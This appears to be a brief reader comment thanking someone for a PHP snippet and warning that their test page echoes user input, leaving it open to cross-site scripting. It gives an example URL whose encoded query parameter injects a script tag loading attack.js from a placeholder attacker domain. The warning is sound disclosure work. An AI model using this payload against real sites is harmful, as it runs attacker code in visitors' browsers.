First of all, thanks for the snippet. ?
But FYI I think your site is vulnerable to XSS because it's just echoing the user-controlled input back to the screen.
https://[your_site]/plus_test.php?message=%3Cscript%20type=text/javascript%20src=%22https://[evil_domain]/attack.js%22%3E%3C/script%22